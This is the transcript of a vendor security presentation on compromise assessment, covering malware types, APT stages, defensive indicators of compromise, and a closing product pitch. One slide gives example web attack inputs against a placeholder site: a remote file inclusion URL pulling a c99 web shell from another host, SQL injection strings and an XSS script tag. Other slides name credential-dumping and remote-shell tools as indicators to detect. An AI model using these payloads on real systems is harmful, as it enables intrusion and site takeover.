1 / 26

Corey White , VP, Professional Services

Mathematical Determination of Good and Bad Leveraging Preventative / Response Professional Services. Cylance. Corey White , VP, Professional Services. PRE SPONSE Professional Services. Risk Does Not Equal Threat | Presponse Compromise Assessment.

pascha
Download Presentation

Corey White , VP, Professional Services

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Mathematical Determination of Goodand Bad Leveraging Preventative/ Response Professional Services Cylance Corey White, VP, Professional Services

  2. PRESPONSE Professional Services

  3. Risk Does Not Equal Threat | Presponse Compromise Assessment

  4. Malware - Windows / Linux / OSX (31% didn’t use malware) • Dropper/Downloaders – Phishing & Waterholing Malware in Userspace Zero/Single-day Exploits that lead to… • Backdoor Trojan RATs – Kernel interactive Service Binaries that mimic legitimate capabilities (RAS/Proxy/AV/Recon/Config) • BOTNETs – Platforms for MAAS/Subscription Access • WebShells – Internet-facing Server Backdoor RATs (c99/r57/eval)

  5. Hacking - .day Exploits • Zero Day • Vulnerability that only the developer knows about • ½ Day • Vulnerability that is known about but no patches are yet available • Single Day • Vulnerability that is known about and patches are available but not applied • Forever Day • Vulnerability that is known and cannot be patched

  6. Hacking - Web Server/Services Exploits • Remote code execution (watch your .htaccess files!) • register_globals on in PHP | require ($page . ".php"); • http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt • SQL injection (watch your user privileges!) • AND / OR in SQL $query | $query = "SELECT * FROM users WHERE username = '' or '1=1'"; • http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version),, • Cross Site Scripting/XSS (watch your syntax!) • Volatile entry in Echo | <?php echo "<p>Your Name <br />"; echo ($_GET[name_1]); ?> • http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script> • Username enumeration (watch your error messages!) • Username guessing | Incorrect logon / password combination

  7. Social Engineering – Access, Behavior, and Authority • Sabotage • Phishing • Waterholing • USB “HoneyDrops” & Other Free Hardware • “HelpDesk Operators” • “Visitors” (Repairmen, Janitors, Pizza/Flower Delivery, Tailgaters) • Subversion • Contractors • Employees

  8. Advanced Persistent Threat - Activities • Stage 2 - Exploit • Privilege Escalation • Lateral Movement • User Profile Abuse • Remote Access Provisioning • Services Bypass/Cancellation • Stage 1 - Compromise • Social Engineering Backdoors • Phishing / Waterholing • Help Desk / Visitors • Web Site Backdoors • Reconnaissance • Stage 3 - Control • Configuration Management • Data Targeting • Data Exfiltration • Sabotage • Subversion

  9. Most commonly seen indicators of data loss: • Non-standard Packagers (7z, Gz, RAR, PKZIP, etc.) • Multipart Files of particular sizes (250/500Mb) • “Recycle”/Recycle Bin Residue • HTTP 206 Status Codes on Web Servers • Non-standard File Transfer Services (Filezilla, FTP, WsFTP, etc.) • Non-standard Reverse/Proxy Services (HUCs, PLINK, NC, SSH, etc.)

  10. Most commonly seen indicators of sabotage: • Unusual Prefetch / Recent / LNK / Bash binary execution history • AT / CRON Jobs • Scripts • Services Cancellation • User Profile Authority Changes

  11. Most commonly seen indicators of user profile abuse: • Multiple user accounts on single computer • User account on multiple computers • Service & Administrative account propagation • Extranet LDAP/AD account use • Account privilege provisioning/modifications (SuSID, MD5, Admins etc.) • Local Services history (MIMIKATZ, PWDUMP, L0pht, CAIN/ABEL)

  12. Most commonly seen indicators of lateral movement: • Access history (Type 3 / 4 / 8 / 10 logins, AuthLog) • MSTSC history (.RDP, .BMC) • Remote job scheduling (AT, SC, WMIC, SSH) • Redundant & non-standard RAS tools (VNC, LogMeIn, TeamViewer, NC, PUTTY, PSEXEC, *FTP, SCP) • Domain Services history (DSGET, DSQUERY, HYENA) • Reconnaissance tools (FPORT, NET/NET1, NETSH, PING)

  13. Most commonly seen indicators of insider threats: • Unusual profile access and use history • Time • HostID • Application History • Configuration History • RBAC violations • Other Acceptable Use Policy violations • Malware / PUP / PUM…

  14. Most common malware identifiers: • Authority – service, administrator, or user • Persistence – only 4 persistence mechanisms in Windows • Communications – only 44 netsvcs keys in Windows Services • Functionality – user and kernel combinations are rare • File System – user or system

  15. Risk Does Not Equal Threat | Presponse Compromise Assessment Issues Not Indicators Focus on Priorities

  16. Get Ahead of Compromise Activities • Monitor • Persistence settings: registry keys, startup folders, scheduled jobs/tasks • Service creations • Alert • User Profile Propagation • Lateral Movement/Access • Anomalous Use (time/resources) • Service State Changes (start/stop) • File creations by type (RAR, BAT, VBS, SH, etc.) • Sinkhole Communications • Prevent • Assess and Secure Networks & Applications • Automated Tasks • Known PUP/PUMs • User-space Execution Prevent

  17. Victimization EMAIL SOCIAL ENGINEERING WEB SUPPLY CHAIN DIRECT OPEN PORTS INSIDER TCP/135 CANDY DROP

  18. Innovation Requires STARVATION

  19. WARNING: Deprogramming Required NOSignatures NO Heuristics NO Behavioral NO Sandboxing NODynamic Detonation NO Micro-Virtualization JUST 100% Pure MATH

  20. MALICIOUS GOOD 100% Pure Math GAP (60%+) Blacklist Whitelist 20% 20% UNKNOWN “THE GREYLIST” Behavioral Analysis Sandboxing IDS/IPS Whitelisting Servers AV Email / WebGateway Antivirus / HIPS Firewall

  21. Trust Trust Vendor the Math the

  22. Infinity Product Portfolio DETECT SWEEP* • Browser delivery • Detection of threats • Silent / small footprint • Detection • with Protection option • V-API • V-Forensics • V-Gateway • V-Helpdesk • Detection only • Windows Agent • Cloud management • Silent / small footprint • Detection and Protection • Free, Silent • REST API over SSL • Advanced Threat • Over 5,000 seats • Detection only FEBRUARY 2014 APRIL 2014 JUNE 2013 OCTOBER 2013

More Related